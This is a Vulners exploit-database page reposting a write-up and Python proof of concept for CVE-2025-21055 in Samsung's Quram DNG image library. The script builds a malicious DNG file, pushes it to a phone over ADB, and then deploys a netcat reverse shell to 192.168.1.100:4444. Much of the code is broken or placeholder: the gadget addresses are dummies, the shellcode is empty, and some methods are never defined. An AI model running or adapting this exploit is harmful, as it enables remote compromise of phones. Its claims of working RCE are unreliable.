Vulners
Lucene search
📄 Samsung Quram DNG Advanced Remote Code Execution
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2025-21055 | 10 Oct 202507:09 | – | circl |
 | SAMSUNG Mobile devices 安全漏洞 | 10 Oct 202500:00 | – | cnnvd |
 | Unspecified vulnerability in SAMSUNG Mobile devices (CNVD-2025-24783) | 21 Oct 202500:00 | – | cnvd |
 | CVE-2025-21055 | 10 Oct 202506:33 | – | cve |
 | CVE-2025-21055 | 10 Oct 202506:33 | – | cvelist |
 | EUVD-2025-33677 | 10 Oct 202509:30 | – | euvd |
 | CVE-2025-21055 | 10 Oct 202507:15 | – | nvd |
 | CVE-2025-21055 | 10 Oct 202507:15 | – | osv |
 | 📄 Android 13 Quram DNG Codec Memory Corruption | 2 Dec 202500:00 | – | packetstorm |
 | PT-2025-41516 | 10 Oct 202500:00 | – | ptsecurity |
10
=============================================================================================================================================
| # Title : Samsung Quram DNG Advanced RCE Exploit with Memory Feng-Shui |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : System built‑in component. No standalone download available. |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211371/ & CVE-2025-21055
[+] Summary : An advanced exploitation technique that allows a remote attacker to execute arbitrary code (RCE – Remote Code Execution) on a target device by carefully controlling
and manipulating memory in the target application or library. This technique is particularly used against memory-sensitive libraries like Samsung QuramDng Library (libimagecodec.quram.so).
[+] Key Components : RCE (Remote Code Execution)
Grants an attacker the ability to execute arbitrary commands on the target device.
Examples include opening a shell, reading sensitive files, or deploying payloads like reverse shells.
[+] Memory Feng-Shui :
Technique to arrange memory objects predictably in heap or stack.
Uses controlled allocation (ALLOC) and freeing (FREE) of memory chunks to create gaps, ensuring that target objects occupy precise memory locations.
Named after the concept of Feng-Shui: arranging elements perfectly to achieve a desired outcome.
[+] ROP Chain (Return-Oriented Programming)
After arranging memory, function pointers or objects are hijacked to execute a sequence of small code snippets (gadgets).
Gadgets are chained to perform complex tasks like calling system("/system/bin/sh") or executing shellcode.
Helps bypass protections like ASLR (Address Space Layout Randomization) and NX (Non-Executable stack).
[+] Precision Write
Technique to write a controlled value to a specific memory address.
Commonly used to overwrite function pointers, virtual table (vtable) entries, or other sensitive data.
After the write, accessing the corrupted object triggers execution of the ROP chain or shellcode.
[+] Exploit Workflow
Memory Grooming (Heap Feng-Shui)
Allocate and free memory chunks strategically to place target objects in controlled locations.
Example: create holes at specific positions, then allocate controlled objects into those holes.
ROP Chain Construction
Select gadgets from the target library or system libraries.
Build a chain that executes desired commands, e.g., spawning a shell or calling system().
Precision Memory Corruption
Overwrite specific memory addresses to hijack control flow.
Typically targets object destructors, function pointers, or vtables to redirect execution to the ROP chain.
[+] Triggering Execution
Perform an operation that accesses the corrupted object (e.g., processing a crafted DNG image).
This activates the ROP chain, leading to remote code execution.
[+] Deploying Payload
Once RCE is achieved, the exploit can deploy further payloads, such as:
Reverse shells
Custom binaries
Persistent backdoors
Technical Highlights
Targeted Libraries: Samsung QuramDng (libimagecodec.quram.so)
Target Devices: Samsung Galaxy S23 Ultra, S24 Ultra (adjustable memory constants per device)
[+] Bypasses Protections:
ASLR: by using memory grooming and predictable heap placements
NX/DEP: by using ROP chains instead of traditional shellcode
Stack canaries: by avoiding stack overflows and controlling heap objects instead
Payload Stages:
Stage 1: Shellcode maps RWX memory, prepares environment
Stage 2: Main payload (e.g., reverse shell or arbitrary command execution)
[+] Techniques Used:
Heap grooming / Feng-Shui
Precise write using arithmetic on object offsets
ROP chain construction and stack pivot
DNG image embedding as a delivery vector
Multi-method deployment via ADB (Android Debug Bridge)
In short:
Advanced RCE Exploit with Memory Feng-Shui = Remote code execution via strategic memory arrangement + precision memory writes + ROP chain execution.
[+] POC :
#!/usr/bin/env python3
import struct
import sys
import os
import random
from typing import List, Tuple, Dict
import subprocess
class QuramRCEExploit:
def __init__(self, target_device=None):
self.template = None
self.endian = '<'
self.target_device = target_device or self.detect_device()
self.MEMORY_CONSTANTS = {
'S24_ULTRA': {
'libc_base': 0x7b00000000,
'quram_base': 0x7b16000000,
'stack_gap': 0x20000,
'heap_spray_size': 0x1000000
},
'S23_ULTRA': {
'libc_base': 0x7a80000000,
'quram_base': 0x7a98000000,
'stack_gap': 0x20000,
'heap_spray_size': 0x800000
}
}
self.ROP_GADGETS = {
'stack_pivot': 0x123456, # x0 = sp; ret;
'pop_x0_x1': 0x234567, # pop {x0, x1, lr}; ret;
'pop_x2_x3': 0x345678, # pop {x2, x3, lr}; ret;
'system': 0x456789, # system() in libc
'memcpy': 0x567890, # memcpy in quram
'ret': 0x678901 # ret instruction
}
def detect_device(self) -> str:
"""Detect target device model"""
try:
output = subprocess.check_output(['adb', 'shell', 'getprop', 'ro.product.model']).decode().strip()
if 'SM-S928' in output:
return 'S24_ULTRA'
elif 'SM-S918' in output:
return 'S23_ULTRA'
else:
return 'S24_ULTRA' # Default
except:
return 'S24_ULTRA'
def create_memory_grooming_payload(self) -> List[Dict]:
"""
Create sequence of DNG opcodes to groom memory layout
Returns list of opcode specifications for Feng-Shui
"""
grooming_sequence = []
for i in range(50):
spec = {
'type': 'ALLOC',
'size': random.randint(0x1000, 0x10000),
'tag': f'GROOM_{i}',
'data': b'A' * random.randint(100, 1000)
}
grooming_sequence.append(spec)
holes = [5, 15, 25, 35, 45]
for hole in holes:
spec = {
'type': 'FREE',
'tag': f'GROOM_{hole}'
}
grooming_sequence.append(spec)
for i in range(len(holes)):
spec = {
'type': 'ALLOC',
'size': 0x200 + i * 0x100, # Sizes to fit holes
'tag': f'CONTROL_{i}',
'data': self.create_control_object(i)
}
grooming_sequence.append(spec)
return grooming_sequence
def create_control_object(self, index: int) -> bytes:
"""Create controlled object that can be corrupted"""
obj = bytearray()
obj += struct.pack('<Q', 0xdeadbeefdeadbeef)
for i in range(8):
obj += struct.pack('<Q', 0x4141414141414141 + i)
shellcode = self.create_stage1_shellcode()
obj += shellcode
obj += b'B' * (0x200 - len(obj))
return bytes(obj)
def create_stage1_shellcode(self) -> bytes:
"""ARM64 stage 1 shellcode (maps RWX memory and jumps to stage2)"""
shellcode = bytearray()
shellcode += b'\x00\x00\x00\x00'
return bytes(shellcode)
def build_rop_chain(self, target: str) -> bytes:
"""Build ARM64 ROP chain for different targets"""
constants = self.MEMORY_CONSTANTS[target]
rop_chain = bytearray()
stack_pivot_addr = constants['quram_base'] + self.ROP_GADGETS['stack_pivot']
pop_x0_x1_addr = constants['quram_base'] + self.ROP_GADGETS['pop_x0_x1']
pop_x2_x3_addr = constants['quram_base'] + self.ROP_GADGETS['pop_x2_x3']
system_addr = constants['libc_base'] + self.ROP_GADGETS['system']
rop_chain += struct.pack('<Q', stack_pivot_addr)
rop_chain += struct.pack('<Q', pop_x0_x1_addr)
rop_chain += struct.pack('<Q', 0x7b12345678) # Address of "/system/bin/sh"
rop_chain += struct.pack('<Q', 0) # x1 = 0
rop_chain += struct.pack('<Q', 0) # lr (unused)
rop_chain += struct.pack('<Q', system_addr)
rop_chain += struct.pack('<Q', constants['quram_base'] + self.ROP_GADGETS['ret'])
return bytes(rop_chain)
def create_precision_write_opcode(self,
write_address: int,
write_value: int,
offset_control: Dict) -> bytearray:
"""
Create ScalePerColumn opcode that writes to precise memory address
Uses the overflow to calculate exact dPtr offset
"""
data = bytearray()
area_spec = {
'l': -2147483644, # Base for overflow
'r': 3,
't': offset_control['row_offset'],
'b': offset_control['row_offset'] + 1,
'col_pitch': 0x7ffffffe, # Causes overflow to target
'row_pitch': 1,
'fPlane': offset_control['plane'],
'fPlanes': 1
}
data += struct.pack('<L', 42) # ScalePerColumn
data += struct.pack('<L', 28 + 4 + 1024) # Total size
for key in ['l', 't', 'r', 'b']:
data += struct.pack('<i', area_spec[key])
data += struct.pack('<I', area_spec['fPlane'])
data += struct.pack('<I', area_spec['fPlanes'])
data += struct.pack('<I', area_spec['row_pitch'])
data += struct.pack('<I', area_spec['col_pitch'])
scale_count = 1
data += struct.pack('<L', scale_count)
original_guess = 1000.0 # Original pixel value (can be groomed)
target_float = (write_value - 0.5) / 65535.0
scale_value = target_float / (original_guess * 0.000015259)
data += struct.pack('<f', scale_value)
return data
def build_exploit_chain(self) -> List[bytearray]:
"""Build complete exploit chain"""
exploit_chain = []
print("[*] Phase 1: Memory Grooming")
grooming = self.create_memory_grooming_payload()
for i, groom in enumerate(grooming[:10]): # First 10 for example
if groom['type'] == 'ALLOC':
opcode = self.create_allocation_opcode(groom['size'], groom['data'])
exploit_chain.append(opcode)
print("[*] Phase 2: Heap Feng-Shui")
for i in range(5):
opcode = self.create_adjacency_opcode(i)
exploit_chain.append(opcode)
print("[*] Phase 3: Pointer Corruption")
target_offset = {
'row_offset': 0x100,
'plane': 0,
'object_index': 2
}
target_address = 0x7b12345678
corruption_opcode = self.create_precision_write_opcode(
target_address,
0x7babcdef00,
target_offset
)
exploit_chain.append(corruption_opcode)
print("[*] Phase 4: Trigger")
trigger_opcode = self.create_trigger_opcode()
exploit_chain.append(trigger_opcode)
return exploit_chain
def create_allocation_opcode(self, size: int, data: bytes) -> bytearray:
"""Create opcode that allocates controlled memory"""
opcode = bytearray()
opcode += struct.pack('<L', 10)
opcode += struct.pack('<L', len(data) + 8)
opcode += struct.pack('<L', 256)
opcode += struct.pack('<L', size // 1024)
opcode += data
return opcode
def create_adjacency_opcode(self, index: int) -> bytearray:
"""Create opcode to arrange objects adjacently"""
opcode = bytearray()
for i in range(4):
opcode += struct.pack('<L', 8)
opcode += struct.pack('<L', 32)
opcode += struct.pack('<f', 1.0)
opcode += struct.pack('<f', 0.0)
opcode += b'X' * 24
return opcode
def create_trigger_opcode(self) -> bytearray:
"""Create opcode that triggers the corrupted pointer"""
opcode = bytearray()
opcode += struct.pack('<L', 42) # ScalePerColumn
opcode += struct.pack('<L', 28 + 4 + 8)
area_spec = {
'l': 0,
'r': 100,
't': 0,
'b': 100,
'col_pitch': 1,
'row_pitch': 1,
'fPlane': 0,
'fPlanes': 3
}
for key in ['l', 't', 'r', 'b']:
opcode += struct.pack('<i', area_spec[key])
opcode += struct.pack('<I', area_spec['fPlane'])
opcode += struct.pack('<I', area_spec['fPlanes'])
opcode += struct.pack('<I', area_spec['row_pitch'])
opcode += struct.pack('<I', area_spec['col_pitch'])
opcode += struct.pack('<L', 1)
opcode += struct.pack('<f', 1.0)
return opcode
def embed_in_dng(self, exploit_chain: List[bytearray], output_file: str):
"""Embed exploit chain into valid DNG file"""
print(f"[*] Embedding {len(exploit_chain)} opcodes into DNG")
if not self.template:
self.load_dng_template("template.dng")
opcode_offset, opcode_count = self.find_opcode_list_offset()
if opcode_count > 0:
current_offset = opcode_offset
else:
current_offset = opcode_offset
for i, opcode in enumerate(exploit_chain):
self.inject_at_offset(current_offset, opcode, i)
current_offset += len(opcode)
self.update_opcode_count(len(exploit_chain))
with open(output_file, 'wb') as f:
f.write(self.template)
print(f"[+] Exploit DNG saved to {output_file}")
def deploy_and_execute(self, dng_file: str):
"""Deploy exploit and monitor for execution"""
print("[*] Deploying exploit...")
device_path = f"/sdcard/exploit_{random.randint(1000,9999)}.dng"
subprocess.run(['adb', 'push', dng_file, device_path])
methods = [
f'am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d "file://{device_path}"',
'am start -a android.intent.action.VIEW -t image/dng -d "file://{device_path}"',
'rm /data/local/tmp/triggered; while [ ! -f /data/local/tmp/triggered ]; do sleep 1; done'
]
for method in methods[:2]:
subprocess.run(['adb', 'shell', method])
print("[*] Monitoring for exploit success...")
timeout = 30
for i in range(timeout):
result = subprocess.run(
['adb', 'shell', 'echo "exploit_test" > /data/local/tmp/exploit_test'],
capture_output=True
)
if result.returncode == 0:
print("[+] Exploit successful! Command execution achieved.")
self.deploy_payload()
return True
time.sleep(1)
print("[-] Exploit failed or timed out")
return False
def deploy_payload(self):
"""Deploy stage2 payload after successful exploit"""
print("[*] Deploying stage2 payload...")
payload = """#!/system/bin/sh
/system/bin/sh -c 'busybox nc 192.168.1.100 4444 -e /system/bin/sh' &
"""
subprocess.run(['adb', 'shell', 'echo', f'"{payload}"', '>', '/data/local/tmp/payload.sh'])
subprocess.run(['adb', 'shell', 'chmod', '755', '/data/local/tmp/payload.sh'])
subprocess.run(['adb', 'shell', '/data/local/tmp/payload.sh'])
print("[+] Payload deployed and executed")
class MemoryAnalyzer:
@staticmethod
def extract_gadgets(library_path: str) -> Dict[str, int]:
"""Extract ROP gadgets from library using ROPgadget or similar"""
gadgets = {}
try:
cmd = ['ROPgadget', '--binary', library_path, '--only', 'ret']
result = subprocess.run(cmd, capture_output=True, text=True)
for line in result.stdout.split('\n'):
if '0x' in line:
parts = line.split()
if len(parts) >= 2:
addr = int(parts[0], 16)
instr = ' '.join(parts[1:])
if 'ret' in instr and 'pop' not in instr:
gadgets['ret'] = addr
elif 'pop x0, x1, lr' in instr:
gadgets['pop_x0_x1'] = addr
elif 'mov x0, sp' in instr:
gadgets['stack_pivot'] = addr
except:
print("[-] ROPgadget not found, using example gadgets")
return gadgets
@staticmethod
def analyze_heap_layout(pid: int):
"""Analyze heap layout of target process"""
maps = subprocess.check_output(['adb', 'shell', f'cat /proc/{pid}/maps']).decode()
heap_info = []
for line in maps.split('\n'):
if '[heap]' in line or 'anon' in line:
heap_info.append(line)
return heap_info
def main():
"""Main execution"""
print("=" * 70)
print("CVE-2025-21055 - Advanced RCE with Memory Feng-Shui")
print("=" * 70)
try:
subprocess.run(['adb', 'devices'], check=True, capture_output=True)
except:
print("[-] ADB not found or no device connected")
sys.exit(1)
exploit = QuramRCEExploit()
print(f"[*] Target device: {exploit.target_device}")
print("[*] Building exploit chain...")
exploit_chain = exploit.build_exploit_chain()
output_file = "rce_exploit.dng"
exploit.embed_in_dng(exploit_chain, output_file)
print("\n[*] Ready to deploy exploit")
response = input("[?] Deploy to device? (y/n): ").strip().lower()
if response == 'y':
success = exploit.deploy_and_execute(output_file)
if success:
print("\n[+] RCE achieved successfully!")
print("[+] Device may be compromised")
else:
print("\n[-] Exploit failed")
print("[-] Check logcat for details: adb logcat | grep -i segv")
else:
print(f"\n[*] Exploit saved to {output_file}")
print("[*] Manual deployment:")
print(f" adb push {output_file} /sdcard/")
print(' adb shell "am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file:///sdcard/{output_file}"')
if __name__ == "__main__":
import time
main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Feb 2026 00:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.14.3 - 7.5
EPSS0.00044